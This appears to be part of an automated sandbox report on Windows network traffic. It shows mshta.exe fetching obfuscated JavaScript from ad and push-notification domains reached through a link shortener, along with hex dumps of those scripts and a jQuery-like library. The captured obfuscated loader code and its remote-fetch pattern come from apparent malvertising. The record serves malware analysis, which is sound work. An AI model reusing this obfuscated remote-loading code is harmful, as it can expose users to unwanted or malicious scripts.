                                                                                                                                                                                                Data Ascii: flat.call(e)}:function(e){return o.concat.apply([],e)},l=o.push,c=o.indexOf,f={},p=f.toString,d=f.hasOwnProperty,h=d.toString,g=h.call(Object),v={},y=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},m=functio
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 67 72 65 70 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 67 72 65 70 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                Data Ascii: s))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(E.grep(this,(function(e,t){return(t+1)%2})))},odd:function(){return this.pushStack(E.grep(this,(function(e,t){return t%2})))},eq:function(e)
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 65 5b 72 5d 29 3b 72 2b 2b 29 3b 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 69 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 21 69 29 66 6f 72 28 3b 74 3d 65 5b 72 2b 2b 5d 3b 29 6e 2b 3d 45 2e 74 65 78 74 28 74 29 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 69 7c 7c 31 31 3d 3d 3d 69 3f 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3a 39 3d 3d 3d 69 3f 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3a 33 3d 3d 3d 69 7c 7c 34 3d 3d 3d 69 3f 65 2e 6e 6f 64 65 56 61 6c 75 65 3a 6e 7d 2c 6d 61 6b 65 41 72
                                                                                                                                                                                                Data Ascii: e[r]);r++);else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)for(;t=e[r++];)n+=E.text(t);return 1===i||11===i?e.textContent:9===i?e.documentElement.textContent:3===i||4===i?e.nodeValue:n},makeAr
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 6e 29 29 29 7d 3b 76 61 72 20 48 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 78 38 30 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c 30 22 3d 3d 3d 65 3f 22 ef bf bd 22 3a 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2b 22 5c 5c 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 45 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                                                                                Data Ascii: ):e.compareDocumentPosition&&16&e.compareDocumentPosition(n)))};var H=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g;function O(e,t){return t?"\0"===e?"":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e}E.escapeSelector=function(e){r
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 5e 22 2b 71 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 71 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 71 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 58 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 55 3d 2f 5e 68 5c 64 24 2f 69 2c 56 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 47 3d 2f 5b 2b 7e 5d 2f 2c 59 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 71 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e
                                                                                                                                                                                                Data Ascii: ^"+q+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+q+"*((?:-\\d)?\\d*)"+q+"*\\)|)(?=[^-]|$)","i")},X=/^(?:input|select|textarea|button)$/i,U=/^h\d$/i,V=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,G=/[+~]/,Y=new RegExp("\\\\[\\da-fA-F]{1,6}"+q+"?|\\\\([^\\r\\n
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 65 53 65 6c 65 63 74 6f 72 28 73 29 3a 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 79 29 29 2c 6f 3d 28 63 3d 63 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 6f 2d 2d 3b 29 63 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 66 65 28 63 5b 6f 5d 29 3b 64 3d 63 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 67 2e 61 70 70 6c 79 28 6e 2c 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 64 29 29 2c 6e 7d 63 61 74 63 68 28 74 29 7b 43 28 65 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 79 26 26 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 6d 65 28 65 2e 72 65 70 6c 61 63 65 28 4c 2c 22 24 31 22 29 2c 74 2c 6e 2c 72 29 7d 66 75
                                                                                                                                                                                                Data Ascii: eSelector(s):t.setAttribute("id",s=y)),o=(c=ce(e)).length;o--;)c[o]=(s?"#"+s:":scope")+" "+fe(c[o]);d=c.join(",")}try{return g.apply(n,h.querySelectorAll(d)),n}catch(t){C(e,!0)}finally{s===y&&t.removeAttribute("id")}}}return me(e.replace(L,"$1"),t,n,r)}fu
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 6e 3d 75 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 4a 29 2c 76 2e 67 65 74 42 79 49 64 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 45 2e 65 78 70 61 6e 64 6f 2c 21 75 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 75 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 45 2e 65 78 70 61 6e 64 6f 29 2e 6c 65 6e 67 74 68 7d 29 29 2c 76 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 29 2c 76 2e 73 63 6f 70 65 3d
                                                                                                                                                                                                Data Ascii: n=u.defaultView)&&n.top!==n&&n.addEventListener("unload",J),v.getById=ne((function(e){return l.appendChild(e).id=E.expando,!u.getElementsByName||!u.getElementsByName(E.expando).length})),v.disconnectedMatch=ne((function(e){return h.call(e,"*")})),v.scope=
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 71 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 6b 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 79 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 79 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53
                                                                                                                                                                                                Data Ascii: bled='disabled'><option selected=''></option></select>",e.querySelectorAll("[selected]").length||p.push("\\["+q+"*(?:value|"+k+")"),e.querySelectorAll("[id~="+y+"-]").length||p.push("~="),e.querySelectorAll("a#"+y+"+*").length||p.push(".#.+[+~]"),e.queryS
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 65 5d 29 2e 6c 65 6e 67 74 68 3e 30 7d 2c 5a 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 75 26 26 75 65 28 65 29 2c 45 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 74 29 7d 2c 5a 2e 61 74 74 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 75 26 26 75 65 28 65 29 3b 76 61 72 20 72 3d 74 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 69 3d 72 26 26 64 2e 63 61 6c 6c 28 74 2e 61 74 74 72 48 61 6e 64 6c 65 2c 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 72 28 65 2c 6e 2c 21 66 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d
                                                                                                                                                                                                Data Ascii: e]).length>0},Z.contains=function(e,t){return(e.ownerDocument||e)!=u&&ue(e),E.contains(e,t)},Z.attr=function(e,n){(e.ownerDocument||e)!=u&&ue(e);var r=t.attrHandle[n.toLowerCase()],i=r&&d.call(t.attrHandle,n.toLowerCase())?r(e,n,!f):void 0;return void 0!=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.749704109.200.199.1114437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:21 UTC416OUTGET /richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: richinfo.co
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:22 UTC460INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: openresty/1.21.4.1
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:21 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 95288
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                x-amz-id-2: fSHbUDNYyhmC2PMsGzp/PuH29JfwGmD6T02sVn6mkd9ei3gQgCb4K9pvYtGjCYIeEVfFAgA3vTw3ssSXnYeNyKlaf5EC17VL
                                                                                                                                                                                                x-amz-request-id: X1TMJZC5W4BM4GEJ
                                                                                                                                                                                                Last-Modified: Mon, 16 Dec 2024 13:17:27 GMT
                                                                                                                                                                                                ETag: "4eb2c767f3bc7992a918be3558d2a0a4"
                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-12-17 07:43:22 UTC15924INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 31 63 37 30 34 2c 5f 30 78 32 65 30 39 39 63 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 31 36 30 36 61 28 5f 30 78 35 35 38 37 64 65 2c 5f 30 78 33 61 33 32 31 64 2c 5f 30 78 31 37 36 38 61 63 2c 5f 30 78 31 39 65 62 33 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 31 35 32 28 5f 30 78 33 61 33 32 31 64 2d 30 78 31 63 36 2c 5f 30 78 31 37 36 38 61 63 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 33 35 31 62 30 63 3d 5f 30 78 33 31 63 37 30 34 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 39 64 33 63 30 28 5f 30 78 32 30 33 37 33 64 2c 5f 30 78 34 66 38 30 32 35 2c 5f 30 78 33 30 30 38 61 30 2c 5f 30 78 35 64 31 66 34 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 31 35 32 28 5f 30 78 35 64 31 66 34 37 2d 30 78 33 38 37 2c 5f 30
                                                                                                                                                                                                Data Ascii: (function(_0x31c704,_0x2e099c){function _0x41606a(_0x5587de,_0x3a321d,_0x1768ac,_0x19eb3c){return _0x1152(_0x3a321d-0x1c6,_0x1768ac);}const _0x351b0c=_0x31c704();function _0xe9d3c0(_0x20373d,_0x4f8025,_0x3008a0,_0x5d1f47){return _0x1152(_0x5d1f47-0x387,_0
                                                                                                                                                                                                2024-12-17 07:43:22 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 28 5f 30 78 34 39 63 37 35 31 2c 5f 30 78 32 38 32 30 62 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 39 63 37 35 31 2d 5f 30 78 32 38 32 30 62 66 3b 7d 2c 27 4c 74 55 52 59 27 3a 5f 30 78 32 37 30 65 63 30 28 30 78 34 34 63 2c 30 78 34 30 61 2c 30 78 34 35 39 2c 30 78 34 37 33 29 2c 27 6a 68 42 54 69 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 65 65 30 35 36 2c 5f 30 78 32 65 32 33 65 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 65 65 30 35 36 21 3d 3d 5f 30 78 32 65 32 33 65 31 3b 7d 2c 27 62 71 4e 61 41 27 3a 5f 30 78 32 37 30 65 63 30 28 30 78 33 36 32 2c 30 78 33 66 64 2c 30 78 33 34 30 2c 30 78 32 61 33 29 2c 27 4e 43 7a 48 45 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 63 62 31 63 2c 5f 30 78 33 66 65 62 34 35 29 7b 72 65 74 75
                                                                                                                                                                                                Data Ascii: unction(_0x49c751,_0x2820bf){return _0x49c751-_0x2820bf;},'LtURY':_0x270ec0(0x44c,0x40a,0x459,0x473),'jhBTi':function(_0x4ee056,_0x2e23e1){return _0x4ee056!==_0x2e23e1;},'bqNaA':_0x270ec0(0x362,0x3fd,0x340,0x2a3),'NCzHE':function(_0x3acb1c,_0x3feb45){retu
                                                                                                                                                                                                2024-12-17 07:43:22 UTC16384INData Raw: 2c 5f 30 78 31 35 64 39 34 35 5b 27 73 72 63 27 5d 3d 5f 30 78 32 38 65 30 35 32 2b 28 5f 30 78 35 66 35 30 65 62 28 30 78 33 36 35 2c 30 78 33 31 31 2c 30 78 33 34 34 2c 30 78 32 33 34 29 2b 5f 30 78 35 66 35 30 65 62 28 30 78 33 34 30 2c 30 78 32 34 64 2c 30 78 33 36 65 2c 30 78 32 63 64 29 2b 5f 30 78 33 30 33 35 63 38 28 30 78 36 35 66 2c 30 78 35 34 35 2c 30 78 35 66 31 2c 30 78 35 38 66 29 29 2b 5f 30 78 31 64 38 31 34 37 5b 5f 30 78 35 66 35 30 65 62 28 30 78 32 35 31 2c 30 78 34 36 66 2c 30 78 33 35 61 2c 30 78 32 38 34 29 5d 2b 5f 30 78 35 31 62 65 31 63 28 2d 30 78 31 38 33 2c 2d 30 78 32 38 2c 2d 30 78 31 63 34 2c 2d 30 78 63 63 29 2b 5f 30 78 33 62 62 33 31 37 5b 27 73 69 74 65 69 64 27 5d 2b 5f 30 78 35 31 62 65 31 63 28 2d 30 78 31 37 2c 2d
                                                                                                                                                                                                Data Ascii: ,_0x15d945['src']=_0x28e052+(_0x5f50eb(0x365,0x311,0x344,0x234)+_0x5f50eb(0x340,0x24d,0x36e,0x2cd)+_0x3035c8(0x65f,0x545,0x5f1,0x58f))+_0x1d8147[_0x5f50eb(0x251,0x46f,0x35a,0x284)]+_0x51be1c(-0x183,-0x28,-0x1c4,-0xcc)+_0x3bb317['siteid']+_0x51be1c(-0x17,-
                                                                                                                                                                                                2024-12-17 07:43:22 UTC16384INData Raw: 61 38 29 2b 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 27 2b 5f 30 78 31 62 31 63 36 34 28 30 78 39 66 2c 30 78 31 34 30 2c 30 78 62 63 2c 30 78 38 35 29 2b 5f 30 78 33 35 62 38 37 30 28 2d 30 78 31 39 2c 2d 30 78 35 66 2c 2d 30 78 31 37 2c 2d 30 78 33 63 29 2b 5f 30 78 31 62 31 63 36 34 28 30 78 32 65 65 2c 30 78 33 32 38 2c 30 78 32 32 38 2c 30 78 33 63 66 29 2b 5f 30 78 31 62 31 63 36 34 28 30 78 32 37 30 2c 30 78 32 66 39 2c 30 78 34 32 32 2c 30 78 33 34 34 29 2b 27 d1 83 d0 b5 d0 bc 5c 78 32 30 72 67 62 61 5c 78 32 30 d0 b4 27 2b 27 d0 bb d1 8f 5c 78 32 30 d0 b7 d0 b0 d0 b4 d0 b0 d0 bd d0 b8 d1 8f 27 2b 27 5c 78 32 30 d1 86 d0 b2 d0 b5 d1 82 d0 b0 5c 78 32 30 d1 81 5c 78 32 30 d0 bf 27 2b
                                                                                                                                                                                                Data Ascii: a8)+'\x20\x20\x20\x20\x20\x20\x20\x20ba'+_0x1b1c64(0x9f,0x140,0xbc,0x85)+_0x35b870(-0x19,-0x5f,-0x17,-0x3c)+_0x1b1c64(0x2ee,0x328,0x228,0x3cf)+_0x1b1c64(0x270,0x2f9,0x422,0x344)+'\x20rgba\x20'+'\x20'+'\x20\x20\x20'+
                                                                                                                                                                                                2024-12-17 07:43:22 UTC16384INData Raw: 35 2c 30 78 34 30 32 29 2b 5f 30 78 31 31 30 61 64 64 28 30 78 34 64 31 2c 30 78 35 35 38 2c 30 78 36 61 36 2c 30 78 35 38 38 29 5d 29 29 2c 27 6c 61 6e 67 75 61 67 65 27 3a 5f 30 78 34 66 34 37 32 39 2c 27 70 75 62 5f 69 64 27 3a 5f 30 78 35 62 32 63 38 31 5b 27 70 75 62 69 64 27 5d 2c 27 73 69 74 65 5f 69 64 27 3a 5f 30 78 35 62 32 63 38 31 5b 5f 30 78 34 65 39 39 34 38 28 30 78 31 35 61 2c 30 78 61 63 2c 30 78 65 32 2c 30 78 31 33 39 29 5d 2c 27 69 61 62 5f 63 61 74 65 67 6f 72 79 27 3a 5f 30 78 35 62 32 63 38 31 5b 5f 30 78 34 65 39 39 34 38 28 30 78 32 36 63 2c 30 78 32 39 37 2c 30 78 31 64 33 2c 30 78 32 65 33 29 5d 2c 27 74 6f 6b 65 6e 27 3a 5f 30 78 33 36 62 61 63 61 5b 5f 30 78 34 65 39 39 34 38 28 30 78 38 33 2c 30 78 31 34 65 2c 30 78 39 32 2c
                                                                                                                                                                                                Data Ascii: 5,0x402)+_0x110add(0x4d1,0x558,0x6a6,0x588)])),'language':_0x4f4729,'pub_id':_0x5b2c81['pubid'],'site_id':_0x5b2c81[_0x4e9948(0x15a,0xac,0xe2,0x139)],'iab_category':_0x5b2c81[_0x4e9948(0x26c,0x297,0x1d3,0x2e3)],'token':_0x36baca[_0x4e9948(0x83,0x14e,0x92,
                                                                                                                                                                                                2024-12-17 07:43:22 UTC13828INData Raw: 64 2c 2d 30 78 39 63 2c 2d 30 78 31 30 39 2c 2d 30 78 35 34 29 2b 5f 30 78 33 66 37 39 33 38 28 2d 30 78 31 35 61 2c 2d 30 78 36 39 2c 30 78 62 2c 2d 30 78 35 39 29 2b 5f 30 78 33 66 62 36 61 38 28 30 78 31 65 33 2c 30 78 32 39 34 2c 30 78 31 35 61 2c 30 78 32 31 63 29 2b 5f 30 78 33 66 62 36 61 38 28 30 78 31 32 39 2c 30 78 32 30 30 2c 30 78 31 36 30 2c 30 78 31 39 30 29 2b 5f 30 78 33 66 62 36 61 38 28 30 78 35 31 2c 30 78 31 37 66 2c 30 78 32 33 38 2c 30 78 31 32 64 29 2b 27 6c 65 3a 5c 78 32 30 6e 6f 72 6d 61 6c 27 2b 27 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 27 66 6f 6e 74 2d 77 65 69 67 68 27 2b 5f 30 78 33 66 37 39 33 38 28 30 78 37 31 2c 2d 30 78 31 38 65 2c 30 78 32 65
                                                                                                                                                                                                Data Ascii: d,-0x9c,-0x109,-0x54)+_0x3f7938(-0x15a,-0x69,0xb,-0x59)+_0x3fb6a8(0x1e3,0x294,0x15a,0x21c)+_0x3fb6a8(0x129,0x200,0x160,0x190)+_0x3fb6a8(0x51,0x17f,0x238,0x12d)+'le:\x20normal'+';\x0a\x20\x20\x20\x20\x20\x20\x20\x20'+'font-weigh'+_0x3f7938(0x71,-0x18e,0x2e


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.74970523.109.170.834437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:22 UTC370OUTGET /ttkXIvunodY/69489 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: enduresopens.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:22 UTC1388INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:22 GMT
                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Accept-ch: sec-ch-ua-platform-version,sec-ch-ua-model,sec-ch-ua-full-version,sec-ch-ua-full-version-list
                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                Access-Control-Allow-Origin: https://goo.su
                                                                                                                                                                                                Access-Control-Allow-Headers: content-type, megageocheckolololo, x-forwarded-for, x-requested-with, cache-control, pragma, expires
                                                                                                                                                                                                Access-Control-Max-Age: 600
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                Set-Cookie: GL_UI4=eJw9jUtOwzAYhPNOC01gpBygR0gopGTJogtOwDLy429qmtiVYxJxeywk2H2a%2BUYTBEFUPSBcsi3iL%2FaCfSfFsROHtm04O7LXTnDB%2BXPDuXji4nBusVVz7xgfySXYzBOzrndLgt1AmqwSvTCSCjx66y%2B5arPqBCm3TMsC6eSNsUDOrVlnslWMRLOJEL2ffMk%2BjUXUNB6V9hjWiMxcxeUd8g%2Blpd%2BUOy%2FUZZkFuL%2BNzJ2NnXolsxDpYJkkhG%2FYCOZoMPYbuaT56swNMKPs%2F%2F3fy3htamSSFiUIqXEXsj88%2Bk0%2F; expires=Wed, 18-Dec-2024 07:43:22 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                Set-Cookie: GL_GI10=eJwNy8EKgkAUBdB5D7IkCy75AX7BgBVha7fhRly4DB1kEN4MM1PR39fZH6UUlwXYehSNvt50fb7ourmDFvDQgyfBYRCbzFz16ZlMBAVwN4KDYNeZTzW6sIKmYw6y2LdG0it8H1ZWsETkrQvehf8E%2BUyBk9tuwHEuFeidnX4jVR19; expires=Wed, 18-Dec-2024 07:43:22 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                Strict-Transport-Security: max-age=1
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                2024-12-17 07:43:22 UTC15INData Raw: 35 0d 0a 2f 2f 20 69 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 5// ie0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.749713213.180.204.904437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:24 UTC366OUTGET /system/context.js HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: an.yandex.ru
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1100INHTTP/1.1 200 Ok
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cache-Control: private, max-age=3600
                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                ETag: "612e5d775134bdcb3314b92a22fa53fb-1176431"
                                                                                                                                                                                                Expires: Tue, 17 Dec 2024 08:43:25 GMT
                                                                                                                                                                                                Keep-Alive: timeout=600
